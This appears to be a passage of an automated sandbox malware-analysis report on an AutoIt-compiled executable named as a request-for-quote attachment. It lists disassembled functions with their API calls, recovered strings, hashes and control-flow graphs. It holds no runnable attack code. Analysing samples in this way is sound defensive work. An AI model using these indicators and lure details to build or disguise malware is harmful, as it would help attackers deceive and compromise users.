                                                        • Opcode ID: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                        • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                        • Opcode Fuzzy Hash: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                        • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A
                                                        Function 00401F20 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 214COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe,00000104,?), ref: 00401F4C
                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                        • __wcsicoll.LIBCMT ref: 00402007
                                                        • __wcsicoll.LIBCMT ref: 0040201D
                                                        • __wcsicoll.LIBCMT ref: 00402033
                                                          • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                        • __wcsicoll.LIBCMT ref: 00402049
                                                        • _wcscpy.LIBCMT ref: 0040207C
                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe,00000104), ref: 00428B5B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                        • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe$CMDLINE$CMDLINERAW
                                                        • API String ID: 3948761352-2687969043
                                                        • Opcode ID: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                        • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                        • Opcode Fuzzy Hash: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                        • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99
                                                        Function 00452719 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 147COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: __fread_nolock$_fseek_wcscpy
                                                        • String ID: D)E$D)E$FILE
                                                        • API String ID: 3888824918-361185794
                                                        • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                        • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                        • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                        • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5
                                                        Function 0040E360 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                        • __wsplitpath.LIBCMT ref: 0040E41C
                                                          • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                        • _wcsncat.LIBCMT ref: 0040E433
                                                        • __wmakepath.LIBCMT ref: 0040E44F
                                                          • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                        • _wcscpy.LIBCMT ref: 0040E487
                                                          • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                        • _wcscat.LIBCMT ref: 00427541
                                                        • _wcslen.LIBCMT ref: 00427551
                                                        • _wcslen.LIBCMT ref: 00427562
                                                        • _wcscat.LIBCMT ref: 0042757C
                                                        • _wcsncpy.LIBCMT ref: 004275BC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                        • String ID: Include$\
                                                        • API String ID: 3173733714-3429789819
                                                        • Opcode ID: f7b2e8dd37dad95b873b636539c9fa9ee4ced90e3c163691215c383b9fb11936
                                                        • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                        • Opcode Fuzzy Hash: f7b2e8dd37dad95b873b636539c9fa9ee4ced90e3c163691215c383b9fb11936
                                                        • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E
                                                        Function 004528BD Relevance: 19.7, APIs: 13, Instructions: 173COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • _fseek.LIBCMT ref: 0045292B
                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                          • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                          • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                        • __fread_nolock.LIBCMT ref: 00452961
                                                        • __fread_nolock.LIBCMT ref: 00452971
                                                        • __fread_nolock.LIBCMT ref: 0045298A
                                                        • __fread_nolock.LIBCMT ref: 004529A5
                                                        • _fseek.LIBCMT ref: 004529BF
                                                        • _malloc.LIBCMT ref: 004529CA
                                                        • _malloc.LIBCMT ref: 004529D6
                                                        • __fread_nolock.LIBCMT ref: 004529E7
                                                        • _free.LIBCMT ref: 00452A17
                                                        • _free.LIBCMT ref: 00452A20
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                        • String ID:
                                                        • API String ID: 1255752989-0
                                                        • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                        • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                        • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                        • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59
                                                        Function 00410490 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 56windowregistryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                        • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                        • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                        • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                        • ImageList_ReplaceIcon.COMCTL32(00B4E470,000000FF,00000000), ref: 00410552
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                        • API String ID: 2914291525-1005189915
                                                        • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                        • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                        • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                        • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99
                                                        Function 00410390 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 76windowregistryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                        • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                        • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                        • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                        • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                        • RegisterClassExW.USER32(?), ref: 0041045D
                                                          • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                          • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                          • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                          • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                          • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                          • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                          • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00B4E470,000000FF,00000000), ref: 00410552
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                        • String ID: #$0$AutoIt v3
                                                        • API String ID: 423443420-4155596026
                                                        • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                        • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                        • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                        • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                        Function 0040A780 Relevance: 16.6, APIs: 8, Strings: 1, Instructions: 881COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _malloc
                                                        • String ID: Default
                                                        • API String ID: 1579825452-753088835
                                                        • Opcode ID: ad9c003b1f2fa77121fbfcba884144bd1a02cdd9abf6dd606c80e641f461d2b6
                                                        • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                        • Opcode Fuzzy Hash: ad9c003b1f2fa77121fbfcba884144bd1a02cdd9abf6dd606c80e641f461d2b6
                                                        • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B
                                                        Function 0040F5C0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 125COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1954 40f5c0-40f5cf call 422240 1957 40f5d0-40f5e8 1954->1957 1957->1957 1958 40f5ea-40f613 call 413650 call 410e60 1957->1958 1963 40f614-40f633 call 414d04 1958->1963 1966 40f691 1963->1966 1967 40f635-40f63c 1963->1967 1968 40f696-40f69c 1966->1968 1969 40f660-40f674 call 4150d1 1967->1969 1970 40f63e 1967->1970 1973 40f679-40f67c 1969->1973 1972 40f640 1970->1972 1974 40f642-40f650 1972->1974 1973->1963 1975 40f652-40f655 1974->1975 1976 40f67e-40f68c 1974->1976 1977 40f65b-40f65e 1975->1977 1978 425d1e-425d3e call 4150d1 call 414d04 1975->1978 1979 40f68e-40f68f 1976->1979 1980 40f69f-40f6ad 1976->1980 1977->1969 1977->1972 1990 425d43-425d5f call 414d30 1978->1990 1979->1975 1982 40f6b4-40f6c2 1980->1982 1983 40f6af-40f6b2 1980->1983 1985 425d16 1982->1985 1986 40f6c8-40f6d6 1982->1986 1983->1975 1985->1978 1988 425d05-425d0b 1986->1988 1989 40f6dc-40f6df 1986->1989 1988->1974 1991 425d11 1988->1991 1989->1975 1990->1968 1991->1985
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: __fread_nolock_fseek_memmove_strcat
                                                        • String ID: AU3!$EA06
                                                        • API String ID: 1268643489-2658333250
                                                        • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                        • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                        • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                        • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754
                                                        Function 00401100 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136windowtimeregistryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1994 401100-401111 1995 401113-401119 1994->1995 1996 401179-401180 1994->1996 1998 401144-40114a 1995->1998 1999 40111b-40111e 1995->1999 1996->1995 1997 401182 1996->1997 2000 40112c-401141 DefWindowProcW 1997->2000 2002 401184-40118e call 401250 1998->2002 2003 40114c-40114f 1998->2003 1999->1998 2001 401120-401126 1999->2001 2001->2000 2007 42b038-42b03f 2001->2007 2011 401193-40119a 2002->2011 2004 401151-401157 2003->2004 2005 40119d 2003->2005 2008 401219-40121f 2004->2008 2009 40115d 2004->2009 2012 4011a3-4011a9 2005->2012 2013 42afb4-42afc5 call 40f190 2005->2013 2007->2000 2010 42b045-42b059 call 401000 call 40e0c0 2007->2010 2008->2001 2016 401225-42b06d call 468b0e 2008->2016 2014 401163-401166 2009->2014 2015 42b01d-42b024 2009->2015 2010->2000 2012->2001 2019 4011af 2012->2019 2013->2011 2021 42afe9-42b018 call 40f190 call 401a50 2014->2021 2022 40116c-401172 2014->2022 2015->2000 2020 42b02a-42b033 call 4370f4 2015->2020 2016->2011 2019->2001 2026 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2019->2026 2027 4011db-401202 SetTimer RegisterWindowMessageW 2019->2027 2020->2000 2021->2000 2022->2001 2030 401174-42afde call 45fd57 2022->2030 2027->2011 2028 401204-401216 CreatePopupMenu 2027->2028 2030->2000 2045 42afe4 2030->2045 2045->2011
                                                        APIs
                                                        • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                        • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                        • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                        • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                        • CreatePopupMenu.USER32 ref: 00401204
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                        • String ID: TaskbarCreated
                                                        • API String ID: 129472671-2362178303
                                                        • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                        • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                        • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                        • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E
                                                        Function 004115D7 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2046 4115d7-4115df 2047 4115ee-4115f9 call 4135bb 2046->2047 2050 4115e1-4115ec call 411988 2047->2050 2051 4115fb-4115fc 2047->2051 2050->2047 2054 4115fd-41160e 2050->2054 2055 411610-41163b call 417fc0 call 41130a 2054->2055 2056 41163c-411656 call 4180af call 418105 2054->2056 2055->2056
                                                        APIs
                                                        • _malloc.LIBCMT ref: 004115F1
                                                          • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                          • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                          • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                        • std::exception::exception.LIBCMT ref: 00411626
                                                        • std::exception::exception.LIBCMT ref: 00411640
                                                        • __CxxThrowException@8.LIBCMT ref: 00411651
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                        • String ID: ,*H$4*H$@fI
                                                        • API String ID: 615853336-1459471987
                                                        • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                        • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                        • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                        • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D
                                                        Function 040B3ED0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
